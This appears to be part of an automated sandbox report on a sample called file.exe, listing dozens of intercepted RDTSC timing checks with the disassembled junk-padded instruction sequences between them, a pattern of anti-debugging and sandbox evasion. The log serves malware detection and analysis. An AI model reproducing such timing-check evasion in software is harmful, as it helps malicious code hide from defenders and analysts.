Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1027D92 second address: 1027D9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 102816B second address: 102817B instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4FE9502C56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 102817B second address: 10281AE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007F4FE915D6A8h 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 jmp 00007F4FE915D6B5h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f push edi 0x00000020 pop edi 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10285D2 second address: 10285D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10285D8 second address: 10285DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1028757 second address: 1028762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1028762 second address: 1028782 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jnp 00007F4FE915D6A6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 102A981 second address: 102A99D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FE9502C68h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4CF81 second address: F4CF89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4CF89 second address: F4CF8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4CF8D second address: F4CF95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4CF95 second address: F4CFAD instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4FE9502C5Eh 0x00000008 jl 00007F4FE9502C62h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 102F2D3 second address: 102F2D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10390AB second address: 10390DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jp 00007F4FE9502C56h 0x0000000c popad 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 pop edx 0x00000013 jnl 00007F4FE9502C5Eh 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F4FE9502C60h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10390DE second address: 10390EE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F4FE915D6A6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F463CD second address: F463D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103C82E second address: 103C857 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FE915D6AEh 0x00000009 jmp 00007F4FE915D6B7h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103C857 second address: 103C87E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE9502C66h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jno 00007F4FE9502C60h 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1050714 second address: 105071C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 105071C second address: 1050720 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1050720 second address: 105072A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4FE915D6A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10524D7 second address: 1052513 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007F4FE9502C56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F4FE9502C64h 0x00000011 push eax 0x00000012 push edx 0x00000013 je 00007F4FE9502C56h 0x00000019 jmp 00007F4FE9502C64h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106A9DD second address: 106A9E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106ACDF second address: 106AD11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F4FE9502C67h 0x0000000b jmp 00007F4FE9502C64h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106AD11 second address: 106AD1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F4FE915D6A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106AD1B second address: 106AD1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106B28E second address: 106B295 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106B40E second address: 106B440 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4FE9502C62h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push ebx 0x0000000c jnl 00007F4FE9502C56h 0x00000012 pop ebx 0x00000013 pop edx 0x00000014 pop eax 0x00000015 jne 00007F4FE9502C70h 0x0000001b push eax 0x0000001c push edx 0x0000001d jnl 00007F4FE9502C56h 0x00000023 push esi 0x00000024 pop esi 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106B583 second address: 106B58F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106E4CA second address: 106E4D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F4FE9502C56h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106E8C8 second address: 106E8DE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F4FE915D6A8h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106FDA5 second address: 106FDC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F4FE9502C67h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106FDC8 second address: 106FDE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4FE915D6ABh 0x00000009 popad 0x0000000a pushad 0x0000000b ja 00007F4FE915D6A6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106FDE1 second address: 106FDE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1071422 second address: 1071428 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1071428 second address: 1071434 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1071434 second address: 1071438 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10731D0 second address: 10731F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F4FE9502C67h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10731F2 second address: 10731FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F4FE915D6A6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10731FD second address: 1073205 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F0EB3 second address: 50F0EB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F0EB7 second address: 50F0EBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F0EBD second address: 50F0EC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F0EC3 second address: 50F0EC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F0EC7 second address: 50F0EE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4FE915D6AEh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F0EE2 second address: 50F0EE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F0EE8 second address: 50F0EF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FE915D6ADh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E0C96 second address: 50E0C9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E0C9C second address: 50E0CC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4FE915D6B7h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E0CC8 second address: 50E0CF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE9502C69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4FE9502C5Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E0CF4 second address: 50E0CFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E0CFA second address: 50E0CFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E0CFE second address: 50E0D65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a movsx edx, si 0x0000000d mov ch, E8h 0x0000000f popad 0x00000010 mov ebp, esp 0x00000012 jmp 00007F4FE915D6B3h 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F4FE915D6ABh 0x00000021 adc ecx, 0C7F704Eh 0x00000027 jmp 00007F4FE915D6B9h 0x0000002c popfd 0x0000002d call 00007F4FE915D6B0h 0x00000032 pop eax 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E0D65 second address: 50E0D6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5120880 second address: 512089C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FE915D6B8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 512089C second address: 51208E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007F4FE9502C5Ch 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 mov bl, cl 0x00000014 push ebx 0x00000015 push esi 0x00000016 pop edi 0x00000017 pop eax 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F4FE9502C5Ah 0x00000024 add ecx, 3559AF58h 0x0000002a jmp 00007F4FE9502C5Bh 0x0000002f popfd 0x00000030 movzx eax, di 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51208E2 second address: 5120922 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4FE915D6B0h 0x00000009 add si, B9B8h 0x0000000e jmp 00007F4FE915D6ABh 0x00000013 popfd 0x00000014 mov cx, 6DEFh 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pop ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F4FE915D6B1h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5120922 second address: 5120928 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5120928 second address: 512092C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C015F second address: 50C01B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, 2Ch 0x00000005 pushfd 0x00000006 jmp 00007F4FE9502C65h 0x0000000b sbb esi, 1881EB96h 0x00000011 jmp 00007F4FE9502C61h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [esp], ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F4FE9502C68h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C01B4 second address: 50C01BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C01BA second address: 50C01D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edx 0x00000005 mov ch, E2h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov eax, 54480173h 0x00000014 mov si, 41CFh 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C01D3 second address: 50C01D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C01D9 second address: 50C022B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE9502C67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+04h] 0x0000000e jmp 00007F4FE9502C66h 0x00000013 push dword ptr [ebp+0Ch] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F4FE9502C67h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C022B second address: 50C0243 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FE915D6B4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0243 second address: 50C025D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE9502C5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C025D second address: 50C0263 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0263 second address: 50C0280 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FE9502C69h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C02DB second address: 50C0340 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4FE915D6AFh 0x00000008 pushfd 0x00000009 jmp 00007F4FE915D6B8h 0x0000000e add ax, D048h 0x00000013 jmp 00007F4FE915D6ABh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c pop ebp 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 pushfd 0x00000021 jmp 00007F4FE915D6B2h 0x00000026 sbb cl, FFFFFFA8h 0x00000029 jmp 00007F4FE915D6ABh 0x0000002e popfd 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E0982 second address: 50E09AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4FE9502C67h 0x00000008 mov edx, esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov si, 0CBDh 0x00000015 mov ch, B7h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E09AC second address: 50E09B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E09B2 second address: 50E09E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c movsx ebx, cx 0x0000000f pushfd 0x00000010 jmp 00007F4FE9502C60h 0x00000015 add ax, 9EF8h 0x0000001a jmp 00007F4FE9502C5Bh 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E09E4 second address: 50E09EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E09EA second address: 50E09EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E09EE second address: 50E09F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E09F2 second address: 50E0A02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E0A02 second address: 50E0A06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E0A06 second address: 50E0A0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F0157 second address: 50F015B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F015B second address: 50F015F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F015F second address: 50F0165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F0165 second address: 50F018F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE9502C62h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F4FE9502C5Dh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F018F second address: 50F0194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F0194 second address: 50F01CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4FE9502C68h 0x00000009 sub si, 6698h 0x0000000e jmp 00007F4FE9502C5Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F01CB second address: 50F01CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F01CF second address: 50F01D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F01D3 second address: 50F01D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F01D9 second address: 50F01DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5120776 second address: 512077A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 512077A second address: 512077E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 512077E second address: 5120784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
